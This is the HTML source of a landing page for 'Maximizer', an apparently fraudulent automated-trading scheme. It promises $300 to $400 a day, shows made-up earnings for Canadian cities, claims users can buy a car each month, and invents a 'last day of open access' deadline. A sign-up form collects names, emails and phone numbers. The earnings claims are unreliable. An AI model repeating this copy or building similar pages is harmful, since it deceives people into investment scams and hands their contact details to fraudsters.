<!DOCTYPE html>
<html lang="en">
    <head>
        <meta http-equiv="Content-Type" content="text/html;charset=UTF-8">
        <meta name="facebook-domain-verification" content="{{fb_domain_verification}}">
        <meta http-equiv="X-UA-Compatible" content="IE=edge">
        <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">

        <title>Maximizer!</title>

        <link href="css/css_custom.css" rel="stylesheet">
        <link href="css/style-form.css" rel="stylesheet">

        <link rel="shortcut icon" href="favicon.ico" type="image/x-icon">

        <!-- Facebook Pixel Code -->
        <script>
            !(function (f, b, e, v, n, t, s) {
                if (f.fbq) return;
                n = f.fbq = function () {
                    n.callMethod ? n.callMethod.apply(n, arguments) : n.queue.push(arguments);
                };
                if (!f._fbq) f._fbq = n;
                n.push = n;
                n.loaded = !0;
                n.version = "2.0";
                n.queue = [];
                t = b.createElement(e);
                t.async = !0;
                t.src = v;
                s = b.getElementsByTagName(e)[0];
                s.parentNode.insertBefore(t, s);
            })(window, document, "script", "https://connect.facebook.net/en_US/fbevents.js");
            {*fbpixels*}
            fbq("track", "PageView");
        </script>
        <noscript>
            <img height="1" width="1" style="display: none;" src="https://www.facebook.com/tr?id={{fbpixel}}&amp;ev=PageView&amp;noscript=1">
        </noscript>
        <!-- End Facebook Pixel Code -->
    </head>

    <body class="index-page" id="index-page">

        <header class="header">
            <div class="container">
                <div class="row center-xs">
                    <div class="flex-rows">
                        <div class="col-xs-12 col-md-12">
                            <h1 class="header__pagetitle">
                                Test the program "Maximizer" for 5 minutes and make sure you earn <span>$300 - $400</span> per day.
                                <br>
                                Last day of open access <span id="dateNow"></span>
                            </h1>
                        </div>
                    </div>
                </div>
                <div class="row">
                    <div class="col-xs-12 col-sm-7">
                        <div class="header__video">
                            <div class="yt_over">
                                <div class="embed-responsive embed-responsive-16by9">
                                    <script src="js/fLcWTI5B-PbLFVgxG.js"></script>
                                </div>
                            </div>
                        </div>
                    </div>
                    <div class="col-xs-12 col-sm-5" id="h1">
                        <div class="register">
                            <p class="register__intro">
                                Get results in less than 5 minutes. Register now and withdraw your first profit tomorrow!
                            </p>
                            <div class="register__form" id="register">
                                <form class="x_form neo_form register-form" style="width: 100%;" method="post">
                                    <input type="text" placeholder="First Name" name="first_name" class="form-input">
                                    <input type="text" placeholder="Last Name" name="last_name" class="form-input">
                                    <input type="email" placeholder="E-mail" name="email">
                                    <div class="form-group">
                                        <input type="hidden" name="phonePrefix" value="7">
                                        <input type="tel" class="input-phone form-input" placeholder name="phone" required>
                                    </div>

                                    <button type="submit" name="submitBtn" class="yellowbutton">Get access</button>
                                </form>
                            </div>
                        </div>
                    </div>
                </div>
            </div>
        </header>
        <!-- CONTENT-->
        <main class="index-page__content">
            <section class="members maps_container">
                <div class="container">
                    <div class="row">
                        <div class="col-xs-12">
                            <h2 class="members__pagetitle">
                                WHERE IN CANADA PEOPLE EARN THE MOST?
                            </h2>
                            <div class="sities">
                                <div class="sity">
                                    <img loading="lazy" src="images/1.png" alt>
                                    <p>Toronto - $1215</p>
                                </div>
                                <div class="sity">
                                    <img loading="lazy" src="images/2.png" alt>
                                    <p>Edmonton - $1287</p>
                                </div>
                                <div class="sity">
                                    <img loading="lazy" src="images/3.png" alt>
                                    <p>Vancouver - $1350</p>
                                </div>
                                <div class="sity">
                                    <img loading="lazy" src="images/4.png" alt>
                                    <p>Quebec - $1412</p>
                                </div>
                            </div>
                            <p class="members__intro">
                                Using a unique "Key Scenario", Maximizer fully automatically opens positive trades on the exchange.
                            </p>
                        </div>
                    </div>
                </div>
            </section>
    

            <section class="promises">
                <div class="container">
                    <div class="row">
                        <div class="col-xs-12">
                            <h2 class="promises__pagetitle">
                                "MAXIMIZER KEEPS ITS PROMISES"
                            </h2>
                        </div>
                        <div class="col-xs-12 col-md-6 col-sm-8 col-lg-offset-1">
                            <ul class="promises__list">
                                <li>
                                    Perfect for both beginners and professionals alike.
                                    <svg class="icon icon-apply">
                                        <use xlink:href="#apply"/>
                                    </svg>
                                </li>
                                <li>
                                    Revolutionary Key Scenario Algorithm
                                    <svg class="icon icon-apply">
                                        <use xlink:href="#apply"/>
                                    </svg>
                                </li>
                                <li>
                                    Users can literally buy one car per month
                                    <svg class="icon icon-apply">
                                        <use xlink:href="#apply"/>
                                    </svg>
                                </li>
                                <li>
                                    Works on any device, registration in 2 minutes
                                    <svg class="icon icon-apply">
                                        <use xlink:href="#apply"/>
                                    </svg>
                                </li>
                            </ul>
                            <!-- <a class="google-play modalActive"></a> -->
                            <!-- <a class="app-store modalActive"></a> -->
                        </div>
                        <div class="col-xs-12 col-md-5 col-sm-4">
                            <div class="phonegif">
                                <img loading="lazy" class="phone stat" src="images/Gif_4.png">
                                <img loading="lazy" class="phone" src="images/Gif_44.gif">
                            </div>
                        </div>


                    </div>
                </div>
                
            </section>
           
        </main>

        <svg height="0" id="svg-sprite" style="display: none;" width="0" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">
            <defs>
                <symbol viewBox="0 0 17.105709075927734 17.105419158935547" id="apply">
                    <path data-nahme="2" d="M13.29 13.28a7.792 7.792 0 1 0-11.019 0 7.792 7.792 0 0 0 11.019 0zm-8.3-6.7l1.752 1.75L10.58 4.5l1.358 1.36-3.835 3.83-1.361 1.36-1.358-1.36-1.752-1.75z"/>
                </symbol>
                <symbol viewBox="0 0 8.978001594543457 14.020000457763672" id="arrow">
                    <path data-name="Forma 1 copy 2" d="M7-.01L.006 7 7 14.01l1.984-1.99L3.974 7l5.01-5.02z"/>
                </symbol>
                <symbol viewBox="0 0 13 16.000999450683594" id="call-put">
                    <path d="M13 6.589h-1.859v5.051H1.5V6.589H0l6.5-6.59zM1.5 12.38h9.625v1.43H1.5v-1.43zm0 2.53h9.625V16H1.5v-1.09z"/>
                </symbol>
                <symbol viewBox="0 0 14.020002365112305 14.020000457763672" id="clock">
                    <path d="M7 14.01A7.01 7.01 0 1 1 14.01 7 7.01 7.01 0 0 1 7 14.01zM7 .92A6.075 6.075 0 1 0 13.075 7 6.075 6.075 0 0 0 7 .92zm-.467 6.54v-5.6h.935v4.67h2.8v.93H6.53z"/>
                </symbol>
                <symbol viewBox="0 0 15.059670448303223 15.067928314208984" id="close">
                    <path d="M9.82 7.531l5.09-5.1a.318.318 0 0 0 0-.443L13.03.103a.317.317 0 0 0-.22-.092.284.284 0 0 0-.22.092l-5.09 5.1-5.09-5.1a.32.32 0 0 0-.44 0L.09 1.988a.318.318 0 0 0 0 .443l5.09 5.1-5.09 5.1a.318.318 0 0 0 0 .443l1.88 1.885a.309.309 0 0 0 .44 0l5.09-5.1 5.09 5.1a.284.284 0 0 0 .22.092.317.317 0 0 0 .22-.092l1.88-1.884a.319.319 0 0 0 0-.444z"/>
                </symbol>
                <symbol viewBox="0 0 74.02001190185547 38.00499725341797" id="logo">
                    <path d="M-.01 37.563h14.86v-5.307H5.61V.413H-.01v37.15zm22.46-28.6c0-2.654 1.13-3.662 2.91-3.662s2.91 1.008 2.91 3.662v20.061c0 2.653-1.12 3.661-2.91 3.661s-2.91-1.008-2.91-3.661V8.958zm-5.61 19.689c0 5.944 3.01 9.341 8.52 9.341s8.53-3.4 8.53-9.341V9.329c0-5.944-3.01-9.341-8.53-9.341s-8.52 3.4-8.52 9.341v19.318zm29.1-6.474h2.55v6.846c0 2.653-1.13 3.609-2.91 3.609s-2.91-.956-2.91-3.609V8.958c0-2.654 1.12-3.662 2.91-3.662s2.91 1.008 2.91 3.662v3.98h5.31V9.329c0-5.944-2.86-9.341-8.38-9.341s-8.37 3.4-8.37 9.341v19.318c0 5.944 2.86 9.341 8.37 9.341s8.38-3.4 8.38-9.341V16.865h-7.86v5.308zM62.58 8.963c0-2.654 1.12-3.662 2.91-3.662s2.91 1.008 2.91 3.662v20.061c0 2.653-1.13 3.661-2.91 3.661s-2.91-1.008-2.91-3.661V8.958zm-5.62 19.689c0 5.944 3.01 9.341 8.53 9.341s8.52-3.4 8.52-9.341V9.329c0-5.944-3.01-9.341-8.52-9.341s-8.53 3.4-8.53 9.341v19.318z"/>
                </symbol>
                <symbol viewBox="0 0 44.340999603271484 44" id="member1">
                    <path d="M16.963 26.59h-7.48a9.146 9.146 0 0 0-9.168 8.99c-.278 1.5-.656 4.12.278 5.05C3.117 43.07 8.827 44 13.218 44c4.49 0 10.1-.93 12.626-3.37.933-.93.565-3.55.278-5.05a9.186 9.186 0 0 0-9.159-8.99zm7.677 12.63c-1.778 1.78-6.178 2.9-11.314 2.9S3.691 41 2.012 39.31c-.189-.37-1.086-10.53 7.48-10.95 1.948-.1 7.579 0 7.579 0 8.395.01 7.758 10.58 7.569 10.86zM13.129 24.9a7.4 7.4 0 0 0 0-14.8 7.471 7.471 0 0 0-7.391 7.4 7.355 7.355 0 0 0 7.391 7.4zm0-12.92a5.521 5.521 0 1 1-5.613 5.52 5.6 5.6 0 0 1 5.613-5.52zM21.74 0v13.58h2.9v6.64l6.645-6.64H44V0H21.74zm20.482 11.8h-11.6l-4.113 4.12V11.8h-2.9V1.88h18.614v9.92zm-9.536-7.31a.5.5 0 0 1 .467-.28 1.014 1.014 0 0 1 .377.09 1.419 1.419 0 0 1 .188.57.776.776 0 0 1-.188.56l-.745.85a7.547 7.547 0 0 0-.467.65 1.908 1.908 0 0 0-.09.75v.84h1.688v-.74a.721.721 0 0 1 .09-.47l.377-.38c.189-.19.377-.37.566-.56a.475.475 0 0 1 .188-.28.518.518 0 0 0 .189-.28c.09 0 .09-.09.188-.28a1.238 1.238 0 0 0 .09-.65 1.9 1.9 0 0 0-.655-1.59 2.676 2.676 0 0 0-1.778-.57 2.463 2.463 0 0 0-1.778.66 2.689 2.689 0 0 0-.844 1.77h1.867a3.329 3.329 0 0 1 .27-.66zm.467 4.4a1.03 1.03 0 0 0-.745.28 1.134 1.134 0 0 0 0 1.49.913.913 0 0 0 .745.28 1.034 1.034 0 0 0 .745-.28 1.062 1.062 0 0 0 .278-.75 1.037 1.037 0 0 0-.278-.74 1.092 1.092 0 0 0-.745-.28z"/>
                </symbol>
                <symbol viewBox="0 0 43 43.24131774902344" id="member2">
                    <path d="M31.8 3.02A3.73 3.73 0 0 0 28.168 0a.755.755 0 0 0 0 1.51 2.265 2.265 0 0 1 0 4.53.75.75 0 0 0 0 1.5A3.722 3.722 0 0 0 31.8 4.53h9.713v6.79H1.483V4.53h12.6a.752.752 0 0 0 .742-.76.743.743 0 0 0-.742-.75H12.74a2.22 2.22 0 0 1 2.088-1.51 2.265 2.265 0 0 1 0 4.53.75.75 0 0 0 0 1.5 3.771 3.771 0 1 0-3.632-4.52H0V43h43V3.02H31.8zm9.713 38.47H1.483V12.82h40.034v28.67zM19.272 1.51a2.265 2.265 0 0 1 0 4.53.75.75 0 0 0 0 1.5 3.771 3.771 0 0 0 0-7.54.755.755 0 0 0 .004 1.51zm4.448 0a2.265 2.265 0 0 1 0 4.53.75.75 0 0 0 0 1.5 3.771 3.771 0 0 0 0-7.54.755.755 0 0 0 .004 1.51zM9.634 24.89a4.526 4.526 0 1 0-4.448-4.52 4.491 4.491 0 0 0 4.452 4.52zm0-7.54a3.02 3.02 0 1 1-2.966 3.02 2.993 2.993 0 0 1 2.97-3.02zm11.862 7.54a4.526 4.526 0 1 0-4.448-4.52 4.491 4.491 0 0 0 4.452 4.52zm0-7.54a3.02 3.02 0 1 1-2.966 3.02 2.993 2.993 0 0 1 2.97-3.02zm11.862 7.54a4.526 4.526 0 1 0-4.448-4.52 4.491 4.491 0 0 0 4.452 4.52zm0-7.54a3.021 3.021 0 1 1-2.965 3.02 2.994 2.994 0 0 1 2.969-3.02zM9.634 36.96a4.526 4.526 0 1 0-4.448-4.52 4.491 4.491 0 0 0 4.452 4.52zm0-7.54a3.02 3.02 0 1 1-2.966 3.02 2.993 2.993 0 0 1 2.97-3.02zm11.862 7.54a4.526 4.526 0 1 0-4.448-4.52 4.491 4.491 0 0 0 4.452 4.52zm0-7.54a3.02 3.02 0 1 1-2.966 3.02 2.993 2.993 0 0 1 2.97-3.02zm11.862 6.04a.75.75 0 1 1-.741.75.742.742 0 0 1 .745-.75zm-2.965-.76a.755.755 0 1 1-.742.76.751.751 0 0 1 .749-.76zm5.931 0a.755.755 0 1 1-.742.76.751.751 0 0 1 .746-.76zm0-6.03a.742.742 0 0 1 .741.75.742.742 0 1 1-1.483 0 .742.742 0 0 1 .746-.75zm-5.931 0a.742.742 0 0 1 .741.75.742.742 0 1 1-1.483 0 .742.742 0 0 1 .749-.75zm1.482 1.51a.75.75 0 1 1-.741.75.742.742 0 0 1 .745-.75zm2.966 0a.75.75 0 1 1-.742.75.742.742 0 0 1 .746-.75zm-1.483 1.5a.751.751 0 0 1 .741.76.741.741 0 1 1-1.482 0 .751.751 0 0 1 .745-.76zm-1.483 1.51a.755.755 0 1 1-.741.76.751.751 0 0 1 .745-.76zm2.966 0a.755.755 0 1 1-.742.76.751.751 0 0 1 .746-.76zm2.224-1.51a.751.751 0 0 1 .741.76.741.741 0 1 1-1.482 0 .751.751 0 0 1 .745-.76zm-7.414 0a.751.751 0 0 1 .742.76.742.742 0 1 1-1.483 0 .751.751 0 0 1 .745-.76zm3.707-3.77a.755.755 0 1 1-.741.76.751.751 0 0 1 .745-.76z"/>
                </symbol>
                <symbol viewBox="0 0 46 50.436668395996094" id="member3">
                    <path d="M25.11 25.55l-10.8-7.83a.834.834 0 0 0-1.16 1.17l7.81 10.83a2.983 2.983 0 0 0 2.17 1.22h.23a2.982 2.982 0 0 0 2.11-.87 3.031 3.031 0 0 0 .86-2.34 2.989 2.989 0 0 0-1.22-2.18zm-.82 3.34a1.317 1.317 0 0 1-1.03.38 1.3 1.3 0 0 1-.95-.54l-4.77-6.6 6.59 4.78a1.284 1.284 0 0 1 .53.95 1.309 1.309 0 0 1-.37 1.03zm20.46-7.13v-.01a22.439 22.439 0 0 0-2.23-5.39c-.01-.02-.01-.03-.02-.05a.138.138 0 0 0-.03-.04 23.074 23.074 0 0 0-2.98-4.03l1.79-1.79 1.18 1.18L46 8.08l-3.54-3.55-3.54 3.55 1.18 1.19-1.79 1.79a22.559 22.559 0 0 0-4.01-2.98.151.151 0 0 0-.04-.04.257.257 0 0 1-.05-.02 22.464 22.464 0 0 0-5.37-2.23h-.02a22.637 22.637 0 0 0-3.32-.63v-.98h1.25a2.09 2.09 0 0 0 0-4.18h-7.5a2.09 2.09 0 0 0 0 4.18h1.25v.98a22.637 22.637 0 0 0-3.32.63h-.02a22.464 22.464 0 0 0-5.37 2.23.257.257 0 0 1-.05.02.151.151 0 0 0-.04.04 23.056 23.056 0 0 0-4.01 2.98L5.9 9.27l1.17-1.19-3.53-3.55L0 8.08l3.54 3.55 1.18-1.18 1.79 1.79a23.074 23.074 0 0 0-2.98 4.03.138.138 0 0 0-.03.04c-.01.02-.01.03-.02.05a22.439 22.439 0 0 0-2.23 5.39v.01a22.531 22.531 0 0 0 0 11.68v.02a22.707 22.707 0 0 0 2.23 5.38.257.257 0 0 1 .02.05c.01.02.03.04.05.07a22.8 22.8 0 0 0 3.49 4.56.219.219 0 0 1 .03.05l.06.03a22.718 22.718 0 0 0 4.57 3.52.151.151 0 0 0 .04.04.689.689 0 0 0 .08.03 22.221 22.221 0 0 0 5.34 2.22h.02a22.38 22.38 0 0 0 11.64 0h.02a22.221 22.221 0 0 0 5.34-2.22.689.689 0 0 0 .08-.03.151.151 0 0 0 .04-.04 22.718 22.718 0 0 0 4.57-3.52.219.219 0 0 0 .05-.03.218.218 0 0 1 .04-.05 22.8 22.8 0 0 0 3.49-4.56.3.3 0 0 0 .05-.07.257.257 0 0 1 .02-.05 22.707 22.707 0 0 0 2.23-5.38v-.02a22.531 22.531 0 0 0 0-11.68zM42.46 6.9l1.18 1.18-1.18 1.19-1.18-1.19zM2.36 8.08L3.54 6.9l1.18 1.18-1.18 1.19zm38.95 25.31l1.6.42a20.781 20.781 0 0 1-1.46 3.51l-1.42-.83a.835.835 0 0 0-.83 1.45l1.42.82a20.541 20.541 0 0 1-2.31 3.01l-1.16-1.16a.815.815 0 0 0-1.17 0 .827.827 0 0 0 0 1.18l1.15 1.16a20.454 20.454 0 0 1-3 2.31l-.82-1.42a.826.826 0 0 0-1.13-.31.847.847 0 0 0-.31 1.15l.82 1.42a20.243 20.243 0 0 1-3.49 1.46l-.43-1.6a.835.835 0 1 0-1.61.44l.43 1.59a20.26 20.26 0 0 1-3.76.5v-1.65a.83.83 0 1 0-1.66 0v1.65a20.26 20.26 0 0 1-3.76-.5l.43-1.59a.835.835 0 1 0-1.61-.44l-.43 1.6a20.243 20.243 0 0 1-3.49-1.46l.82-1.42a.847.847 0 0 0-.31-1.15.826.826 0 0 0-1.13.31l-.82 1.42a20.454 20.454 0 0 1-3-2.31l1.15-1.16a.827.827 0 0 0 0-1.18.815.815 0 0 0-1.17 0l-1.16 1.16a20.541 20.541 0 0 1-2.31-3.01l1.42-.82a.835.835 0 1 0-.83-1.45l-1.42.83a20.444 20.444 0 0 1-1.46-3.51l1.6-.42a.853.853 0 0 0 .59-1.03.837.837 0 0 0-1.03-.59l-1.59.43a21.256 21.256 0 0 1-.49-3.76h1.65a.84.84 0 0 0 0-1.68H2.17A21.256 21.256 0 0 1 2.66 23l1.59.43a.892.892 0 0 0 .22.03.84.84 0 0 0 .22-1.65l-1.6-.43a20.343 20.343 0 0 1 1.46-3.5l1.42.83a.869.869 0 0 0 .41.11.847.847 0 0 0 .73-.42.835.835 0 0 0-.31-1.14l-1.42-.83a21 21 0 0 1 2.31-3l1.15 1.16a.858.858 0 0 0 .59.24.83.83 0 0 0 .59-1.42l-1.15-1.17a21.66 21.66 0 0 1 2.99-2.31l.82 1.43a.847.847 0 0 0 .73.42.869.869 0 0 0 .41-.11.849.849 0 0 0 .31-1.15l-.82-1.43a21.062 21.062 0 0 1 3.49-1.46l.43 1.61a.872.872 0 0 0 1.02.59.844.844 0 0 0 .59-1.03l-.43-1.59a18.671 18.671 0 0 1 3.01-.45c.25-.02.49-.04.71-.05h.04v1.65a.83.83 0 1 0 1.66 0V6.71h.04c.22.01.45.03.71.05a18.671 18.671 0 0 1 3.01.45l-.43 1.59a.844.844 0 0 0 .59 1.03.82.82 0 0 0 .22.02.831.831 0 0 0 .8-.61l.43-1.61a21.062 21.062 0 0 1 3.49 1.46l-.82 1.43a.849.849 0 0 0 .31 1.15.869.869 0 0 0 .41.11.847.847 0 0 0 .73-.42l.82-1.43a21.66 21.66 0 0 1 2.99 2.31l-1.15 1.17a.83.83 0 0 0 .59 1.42.858.858 0 0 0 .59-.24l1.15-1.16a21 21 0 0 1 2.31 3l-1.42.83a.835.835 0 0 0-.31 1.14.847.847 0 0 0 .73.42.869.869 0 0 0 .41-.11l1.43-.83a21.129 21.129 0 0 1 1.45 3.5l-1.59.43a.84.84 0 0 0 .21 1.65.892.892 0 0 0 .22-.03l1.59-.43a21.256 21.256 0 0 1 .49 3.76h-1.65a.84.84 0 0 0 0 1.68h1.65a21.256 21.256 0 0 1-.49 3.76l-1.59-.43a.84.84 0 1 0-.44 1.62zM22.17 5.04V2.51h-2.92a.42.42 0 0 1 0-.84h7.5a.42.42 0 0 1 0 .84h-2.92v2.53c-.29-.02-.56-.02-.83-.02s-.54 0-.83.02z"/>
                </symbol>
                <symbol viewBox="0 0 37.1810302734375 53.10000228881836" id="member4">
                    <path d="M16.034 16.82l4.11-3.02-2.273-3.67-4.179 2.9zm-7.692-5.05l3.308-2.05 2.047 3.31-3.31 2.04zm6.428 10.39l-2.042-3.3 3.308-2.04 2.042 3.3zm5.374-8.36l2.065 3.34 3.632-1.51-2.041-3.3zM30.57 7.45l-3.148 2.31 2.048 3.31 3.143-2.31zm-.85-6.16s-.915-2.02-1.426-.97a18.317 18.317 0 0 1-4.578 6.47 3.87 3.87 0 0 1-.808.65c-1.235.77-3.324 1.32-6.259-.39a7.352 7.352 0 0 0-7.329.3c-2.069 1.28-3.816 3.61-5.187 6.94l-.015.03-.63-1.02a1.011 1.011 0 0 0-1.265-1.56L.467 12.82a1.024 1.024 0 0 0-.331 1.41 1.013 1.013 0 0 0 1.235.4l23.348 37.74 2.123-1.31-13.11-21.2.22-1.03c.008-.05.951-4.24 4.261-6.29a8.458 8.458 0 0 1 6.375-.88 9.191 9.191 0 0 0 7.5-.84 10.729 10.729 0 0 0 4.565-7.07l.366-.79zM13.365 27.65l-.281-.45.6-.37c-.13.3-.238.59-.319.82zm10.163-7.05l.445-.6.455.73c-.302-.06-.603-.1-.9-.13zm11.889-5.31l-1.038-1.68-3.118 2.35 1.814 2.93a7.735 7.735 0 0 1-1.458 1.17 7.478 7.478 0 0 1-2.431.96l-1.458-2.35 3.533-2.71-1.788-2.89-3.627 2.56 1.788 2.89-3.73 1.36-1.7-2.74-4.131 2.97.7 1.13a10.358 10.358 0 0 0-1.032.53 9.133 9.133 0 0 0-2.087 1.82l-.888-1.43-3.494 2.16-2.066-3.28 3.518-2.18-2.342-3.79-3.547 2.2-1.789-2.85c.126-.3.256-.58.387-.86l2.9-1.79-.913-1.48a9.484 9.484 0 0 1 2.363-2.18c.217-.13.432-.25.642-.35l1.217 1.96 3.676-2.27a5.261 5.261 0 0 1 .875.37c.125.07.243.13.364.2l1.311 2.11 2.384-1.07a6.224 6.224 0 0 0 1.426-.16l2.122 3.43 3.622-2.56-2.058-3.34a14.733 14.733 0 0 0 1.109-1.31l1.917-1.18-.531-.87a16.837 16.837 0 0 0 .788-1.83l1.038 1.68-1.3 1.01 2.173 3.52 1.177-1.25 2.2 3.53-1.332 1.03 1.766 2.85 1.27-1.15.052.08z"/>
                </symbol>
                <symbol viewBox="0 0 46.004005432128906 49.280006408691406" id="member5">
                    <path d="M27.929 17.22a.822.822 0 0 0 .821.82h8.214a.82.82 0 1 0 0-1.64H28.75a.816.816 0 0 0-.821.82zm4.928 4.93a.822.822 0 0 0 .822.82h4.928a.825.825 0 0 0 0-1.65h-4.928a.824.824 0 0 0-.822.83zm-.821-9.04a.82.82 0 1 0 0-1.64h-1.643a.82.82 0 1 0 0 1.64h1.643zm-9.857 8.21a.825.825 0 0 0 0 1.65h8.214a.825.825 0 0 0 0-1.65h-8.214zm4.107 23.01H10.679a2.472 2.472 0 0 1-2.465-2.47V4.07a.822.822 0 0 0-.821-.82 4.111 4.111 0 0 0-4.107 4.11.822.822 0 0 0 1.643 0 2.478 2.478 0 0 1 1.642-2.33v36.83a4.111 4.111 0 0 0 4.108 4.11h15.607a.82.82 0 1 0 0-1.64zM13.964 18.04h11.5a.82.82 0 1 0 0-1.64h-11.5a.82.82 0 1 0 0 1.64zm0-4.93h3.286a.82.82 0 1 0 0-1.64h-3.286a.82.82 0 1 0 0 1.64zm13.143-1.64h-6.571a.82.82 0 1 0 0 1.64h6.571a.82.82 0 1 0 0-1.64zm11.5-11.49H7.393A7.409 7.409 0 0 0 0 7.35v.04a7.409 7.409 0 0 0 3.7 6.37.821.821 0 0 0 .823-1.42A5.737 5.737 0 0 1 7.397 1.63h31.214a5.757 5.757 0 0 1 5.75 5.75v34.5a2.385 2.385 0 0 1-.336 1.21.817.817 0 0 0 .292 1.12.8.8 0 0 0 .415.12.826.826 0 0 0 .709-.41 4.013 4.013 0 0 0 .563-2.04V7.38a7.4 7.4 0 0 0-7.397-7.4zm2.464 37.78a4.929 4.929 0 1 0-4.928 4.92 4.933 4.933 0 0 0 4.928-4.92zm-4.928 3.28a3.285 3.285 0 1 1 3.285-3.28 3.286 3.286 0 0 1-3.285 3.28zm-1.483 2.47a.813.813 0 0 0-1.122.3l-1.768 3.06-.281-.42a.824.824 0 0 0-.636-.37l-.508-.03 1.8-3.11a.821.821 0 0 0-1.423-.82l-2.462 4.26a.821.821 0 0 0 .663 1.23l1.423.09.786 1.19a.824.824 0 0 0 .686.37h.025a.83.83 0 0 0 .687-.42l2.434-4.21a.818.818 0 0 0-.304-1.12zm6.927-1.36a.824.824 0 1 0-1.423.83l1.776 3.07-.507.03a.827.827 0 0 0-.637.37l-.279.42-1.76-3.05a.83.83 0 0 0-1.122-.3.82.82 0 0 0-.3 1.12l2.425 4.21a.841.841 0 0 0 .687.41h.025a.828.828 0 0 0 .686-.37l.785-1.19 1.423-.09a.822.822 0 0 0 .663-1.23zM13.964 22.97h4.929a.825.825 0 0 0 0-1.65h-4.929a.825.825 0 0 0 0 1.65zm0 4.93h9.857a.825.825 0 0 0 0-1.65h-9.857a.825.825 0 0 0 0 1.65zm.087 10.22a.82.82 0 1 0 1.469-.73c-.813-1.63-1-3.09-.49-3.91a1.527 1.527 0 0 1 1.4-.65.668.668 0 0 1 .63.26c.613.88.031 3.57-.578 5.2a.822.822 0 0 0 1.351.87c.35-.35.731-.7 1.062-.98v.4a.828.828 0 0 0 .507.76.845.845 0 0 0 .895-.18 10.33 10.33 0 0 1 1.177-1.01l-.029.06a.823.823 0 0 0 .736 1.19h3.285a.82.82 0 1 0 0-1.64h-2.138a1.58 1.58 0 0 0-.148-1.11 1.145 1.145 0 0 0-1-.54 3.222 3.222 0 0 0-1.651.69.948.948 0 0 0-.575-.78 1.127 1.127 0 0 0-1.188.2c.27-1.41.349-3.05-.356-4.06a2.269 2.269 0 0 0-1.98-.98 3.132 3.132 0 0 0-2.8 1.44c-.816 1.33-.665 3.33.421 5.5zm22.092-11.04a.824.824 0 0 0-.822-.83h-8.214a.825.825 0 0 0 0 1.65h8.214a.822.822 0 0 0 .822-.82z"/>
                </symbol>
                <symbol viewBox="0 0 42.999996185302734 43" id="member6">
                    <path d="M42.31 38.88H4.12V.69a.69.69 0 0 0-1.38 0v5.79H.69a.691.691 0 0 0-.69.69.683.683 0 0 0 .69.68h2.05v5.11H.69a.691.691 0 0 0-.69.69.683.683 0 0 0 .69.68h2.05v5.11H.69a.691.691 0 0 0-.69.69.683.683 0 0 0 .69.68h2.05v5.11H.69a.691.691 0 0 0-.69.69.683.683 0 0 0 .69.68h2.05v5.11H.69a.691.691 0 0 0-.69.69.683.683 0 0 0 .69.68h2.05v5.8a.691.691 0 0 0 .69.69h10.14v2.05a.691.691 0 0 0 .69.69.683.683 0 0 0 .68-.69v-2.05H30.8v2.05a.691.691 0 0 0 .69.69.683.683 0 0 0 .68-.69v-2.05h10.14a.69.69 0 0 0 0-1.38zM7.09 37.51a.691.691 0 0 0 .69-.69V20.81h5.79v16.01a.691.691 0 0 0 .69.69.683.683 0 0 0 .68-.69v-9.53h5.42v9.53a.683.683 0 0 0 .68.69.691.691 0 0 0 .69-.69V26.61a.691.691 0 0 0-.69-.69h-6.1v-5.79a.683.683 0 0 0-.68-.69H7.09a.691.691 0 0 0-.69.69v16.69a.691.691 0 0 0 .69.69zm17.61 0a.691.691 0 0 0 .69-.69V7.85h5.41v28.97a.691.691 0 0 0 .69.69.683.683 0 0 0 .68-.69V14.33h5.8v22.49a.685.685 0 1 0 1.37 0V13.65a.691.691 0 0 0-.69-.69h-6.48V7.17a.683.683 0 0 0-.68-.69H24.7a.683.683 0 0 0-.68.69v29.65a.683.683 0 0 0 .68.69z"/>
                </symbol>
                <symbol viewBox="0 0 38.32915496826172 32.41363525390625" id="pass">
                    <path data-name="Shape 1 copy 7" d="M37.51 27.29L21.92 1.651a3.422 3.422 0 0 0-5.84 0L.49 27.29a3.366 3.366 0 0 0-.05 3.414 3.414 3.414 0 0 0 2.97 1.721h31.18a3.414 3.414 0 0 0 2.97-1.721 3.366 3.366 0 0 0-.05-3.414zm-2.1 2.207a.948.948 0 0 1-.82.474H3.41a.948.948 0 0 1-.82-.474.929.929 0 0 1 .02-.939L18.2 2.918a.935.935 0 0 1 1.6 0l15.59 25.64a.929.929 0 0 1 .02.939zm-16.4-19.388a1.463 1.463 0 0 0-1.67 1.389c0 2.709.32 6.6.32 9.312a1.125 1.125 0 0 0 1.35 1 1.2 1.2 0 0 0 1.33-1c0-2.71.32-6.6.32-9.312a1.466 1.466 0 0 0-1.65-1.389zm.02 13.273a1.753 1.753 0 1 0 0 3.506 1.753 1.753 0 0 0 0-3.506z"/>
                </symbol>
            </defs>
        </svg>

        <svg version="1.1" id="loader" style="display: none;" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" xmlns:a="http://ns.adobe.com/AdobeSVGViewerExtensions/3.0/" x="0px" y="0px" width="150px" viewBox="0 0 48 34" enable-background="new 0 0 48 34" xml:space="preserve">
            <defs>
                <clippath id="mask">
                    <polygon transform="rotate(180 18 11)" points="10,15.2 13.5,10.9 23.2,20.8 35.7,7.9 35.7,0 10,0 "/>
                </clippath>
            </defs>

            <g transform="rotate(180 18 11)" clip-path="url(#mask)">
                <rect x="0" y="0" width="7" height="14" fill="#f2f2f2">
                    <animatetransform attributeType="xml" attributeName="transform" type="scale" values="1,1; 1,1.5; 1,1" begin="0.4s" dur="0.8s" repeatCount="indefinite"/>
                </rect>
                <rect x="9" y="0" width="7" height="19" fill="#f2f2f2">
                    <animatetransform attributeType="xml" attributeName="transform" type="scale" values="1,0.2; 1,1.2; 1,0.2" begin="0.3s" dur="0.8s" repeatCount="indefinite"/>
                </rect>
                <rect x="18" y="0" width="8" height="14" fill="#f2f2f2">
                    <animatetransform attributeType="xml" attributeName="transform" type="scale" values="1,0.2; 1,1.5; 1,0.2" begin="0s" dur="0.8s" repeatCount="indefinite"/>
                </rect>
            </g>

            <polygon fill="#E67E25" points="38.6,2 41.4,4.2 36.1,10.2 29.5,17 26.8,19.8 23.3,23.3 19.9,19.8 17.1,17 13.7,13.5 10.2,17.7 0,30.2 10,20.8 10,34 16.9,34 16.9,22.2 19.7,25.1 19.7,34 26.7,34 26.7,25.3 29.5,22.5 29.5,34 36.4,34 36.4,15.5 44.1,7.1
        46.4,9.7 48,0   "/>
        </svg>

        <!-- end CONTENT-->
        <footer class="footer">
